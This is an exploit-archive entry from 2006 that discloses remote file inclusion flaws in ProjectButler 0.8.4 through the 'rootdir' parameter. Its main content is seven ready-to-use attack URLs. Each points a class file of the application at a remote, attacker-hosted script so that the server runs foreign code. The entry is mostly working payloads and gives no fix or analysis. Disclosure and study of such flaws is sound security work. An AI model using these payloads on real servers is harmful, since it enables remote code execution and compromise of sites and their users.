[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ProjectButler <= 0.8.4 (rootdir) Remote File Include Vulnerabilities
# Published : 2006-08-14
# Author : the master
# Previous Title : Mambo mmp Component <= 1.2 Remote File Include Vulnerability
# Next Title : Mambo Peoplebook Component 1.0 Remote File Include Vulnerability
########################################################################
# projectbutler-0.8.4 Remote File Inclusion Vulnerability
#
# Download: http://prdownloads.sourceforge.net/projectbutler/projectbutler-0.8.4.tar.gz?download
#
# Found By: the master
#
########################################################################
# exploit:
#
# http://[Target]/[Path]/classes/Cache.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/Customer.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/Performance.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/Project.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/Representative.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/User.class.php?rootdir=http://cmd.gif?
# http://[Target]/[Path]/classes/common.php?rootdir=http://cmd.gif?
########################################################################
# www.Syue.com [2006-08-14]